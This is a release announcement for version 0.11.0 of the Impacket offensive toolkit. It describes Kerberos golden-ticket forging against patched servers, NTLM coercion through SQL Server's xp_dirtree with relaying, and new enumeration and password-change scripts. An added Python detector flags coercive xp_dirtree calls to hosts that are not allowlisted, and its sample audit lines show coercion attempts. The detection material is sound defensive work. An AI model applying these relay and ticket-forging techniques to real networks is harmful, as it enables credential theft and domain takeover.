First published in coresecurity.com
We are thrilled to announce a new version of Impacket!
After months of hard work and dedication, Impacket v0.11.0 is now available and has a bunch of new and exciting features. We can’t wait for you to explore and enjoy the added capabilities that come with this version!
Let’s take a look at everything new included in this release.
What’s New in Impacket v0.11.0?
Long Live the Golden Tickets
In October 2022, Microsoft enforced the security patch KB5008380 ("Authentication updates"), which added new safeguards to the Kerberos Privileged Attribute Certificate (PAC) and tightened the validations performed during authentication. That meant the way we used to forge tickets in Impacket didn’t work anymore. Everything changed! Would we have to say goodbye to golden tickets? But fear not, our community is great.
Following Windows’ hardening, @Dramelac opened PR #1391, which implemented the new PAC structure in the Impacket library and in ticketer.py. Now we can generate golden tickets that are accepted by fully patched servers!
Relaying Everything Everywhere
You know, we love hashes, and we love to relay them everywhere! So, for this release, we’ve updated mssqlclient.py (PR #1397), adding new commands, including the xp_dirtree option. This command allows us to coerce NTLM authentications from targeted SQL Servers; the incoming authentications can then be caught and relayed with ntlmrelayx.py wherever we need them! Thanks @Mayfly277, @trietend and @TurtleARM for your contribution to this update.
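From the defensive side, the coercion described above leaves a clear trace: an extended stored procedure such as xp_dirtree being handed a UNC path that points at a host which is not a known file server. The following detector is an added example and is not part of Impacket or of the original post; it runs over a few constructed SQL Server audit lines (timestamp, login, statement, a format assumed for the example) and flags calls to xp_dirtree, xp_fileexist and xp_subdirs whose UNC target is outside an allowlist of legitimate file servers.

```python
import re

# Constructed sample lines in the shape "<timestamp> <login> <statement>".
# The format, logins and hosts are made up for this example.
SAMPLE_AUDIT_LINES = [
    "2024-01-10T10:00:01Z CORP\\svc_report EXEC master..xp_dirtree '\\\\fileserver01\\reports',1,1",
    "2024-01-10T10:00:07Z sa EXEC master..xp_dirtree '\\\\10.0.5.77\\share',1,1",
    "2024-01-10T10:00:09Z CORP\\alice SELECT name FROM sys.databases",
    "2024-01-10T10:00:15Z CORP\\bob EXEC xp_fileexist '\\\\198.51.100.23\\x'",
]

# Extended stored procedures that take a path argument: when given a UNC path,
# the SQL Server service account authenticates to that host (NTLM coercion).
PROC_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.IGNORECASE)

# Captures the host portion of a UNC path: \\host\share...
UNC_RE = re.compile(r"\\\\([^\\\s'\"]+)\\")


def find_unc_coercion(lines, allowed_hosts):
    """Return one finding per line where a coercible procedure is called with a
    UNC path whose host is not in allowed_hosts (compared case-insensitively)."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) != 3:
            continue  # malformed line, skip
        timestamp, login, statement = parts
        proc = PROC_RE.search(statement)
        if not proc:
            continue  # not a path-taking extended procedure
        for host in UNC_RE.findall(statement):
            if host.lower() in allowed:
                continue  # legitimate file server, expected traffic
            findings.append({
                "timestamp": timestamp,
                "login": login,
                "proc": proc.group(1).lower(),
                "host": host,
            })
    return findings


if __name__ == "__main__":
    # Only fileserver01 is a sanctioned UNC target in this constructed environment.
    for f in find_unc_coercion(SAMPLE_AUDIT_LINES, {"fileserver01"}):
        print(f"{f['timestamp']} {f['login']} called {f['proc']} against \\\\{f['host']}")
```

The allowlist is the important design choice: xp_dirtree against the corporate file server is normal reporting traffic, while the same procedure aimed at a bare IP address or an unknown host is what a relay attempt looks like, so alerting on every call would only generate noise.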
As for ntlmrelayx.py, PR #1289 made it possible to add a DNS record through LDAP, which increases the chances of obtaining authentications from outside the local subnet. You can find out more about this in @SAERXCIT’s blog post. Thanks @SAERXCIT for your work on this.
From this version onwards it is also possible to spawn an interactive SQL shell when relaying to the MSSQL protocol (PR #1535). This is a handy way to run SQL commands on the target system. Thanks @sploutchy for all your efforts.
Fresh Example Scripts
We have several new example scripts for this release:
- net.py (PR #1382) mimics the Windows net command, but against a remote target through the SAMR protocol. Thank you, @NtAlexio2.
- changepasswd.py (PR #1559) combines password changing and resetting through different protocols: SMB (already implemented in the example smbpasswd.py, using SAMR over MS-RPC transport), Kerberos, and LDAP. With this new example, operators can change the password of a target user through any of these protocols with one single script. This simplifies the task of changing passwords by combining PR #1177, PR #1304, and PR #1189. Thanks go to @Alef-Burzmali.
- DumpNTLMInfo.py (PR #1523) dumps remote host information exposed by the NTLM authentication exchange, without credentials, for the SMB protocols (1/2/3). Thanks to @NtAlexio2.
Examples Clean Up
You will notice that some examples are showing the following banner when executed:
==============================================================================
Warning: This functionality will be deprecated in the next Impacket version
==============================================================================
With the goal of better managing the library and prioritizing the latest and most requested use cases, we are tagging a select group of examples as “to be deprecated.”
We are not removing them at once; we give notice one version in advance to provide ample time to prepare for the change.
These are the ones marked to be deprecated in the next release:
- examples/nmapAnswerMachine.py
- examples/smbrelayx.py
- examples/smbpasswd.py (check examples/changepasswd.py – PR #1559)
There is more…
Want more? You can check out a fully detailed list of all new features and enhancements in the release notes here. Enjoy.
Getting Impacket Release v0.11.0
If you want to know more about the example scripts and library functionality, you can find it at the Impacket site, or you can get the latest stable release directly from GitHub.
To install this release, execute the following command from the directory where Impacket’s distribution has been unpacked: python3 -m pipx install .
Final Notes
As always, thanks a lot to all the contributors who have made Impacket better every day since the last version:
@ly4k, @nopernik, @snovvcrash, @_nwodtuhs, @mhskai2017, @mpgn_x64, @CT-H00K, @rmaksimov, @arossert, @aevy-syn, @tirkarthi, @podalirius, @Dramelac, @M4yFly, @ShitSecure, @nobbd, @mr_mitm, @trietend, @TurtleARM97, @lowercase_drm, @SAERXCIT, @clavoillotte, @Marshall-Hallenbeck, @sploutchy, @almandin, @rtpt-alexanderneumann, @JerAxxxxxxx, @NtAlexio2, @laxa, @godylockz, @exploide, @jojonas, @Zamanry, @erasmusc, @bugch3ck, @ljrk0, @NaisuBanana, @shoxxdj, @Alef-Burzmali, @bransh, and @oddvarmoe.
Feedback and pull requests are very welcome. Contributions from the community are the mainstay of this open-source initiative.
If you have any doubts, questions, or suggestions, don’t hesitate to fill out our contact form.
We hope you enjoy this new release. Happy hacking!